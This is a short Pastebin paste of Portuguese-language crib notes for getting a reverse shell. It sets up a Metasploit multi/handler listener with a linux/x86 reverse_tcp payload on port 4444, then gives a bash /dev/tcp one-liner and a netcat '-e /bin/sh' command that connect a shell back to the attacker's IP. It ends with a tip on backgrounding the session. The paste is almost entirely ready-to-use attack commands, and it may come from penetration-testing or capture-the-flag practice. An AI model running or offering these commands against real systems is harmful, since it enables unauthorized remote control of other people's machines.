Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- msfconsole
- use exploit/multi/handler
- set lhost ip
- set lport 4444
- set payload linux/x86/shell/reverse_tcp
- run
- bash -i >& /dev/tcp/seu ip/4444 0>&1
- nc ip do alvo 4444 -e /bin/sh
- Após adquirir a sessão: Ctrl + z > y
Advertisement
Add Comment
Please, Sign In to add comment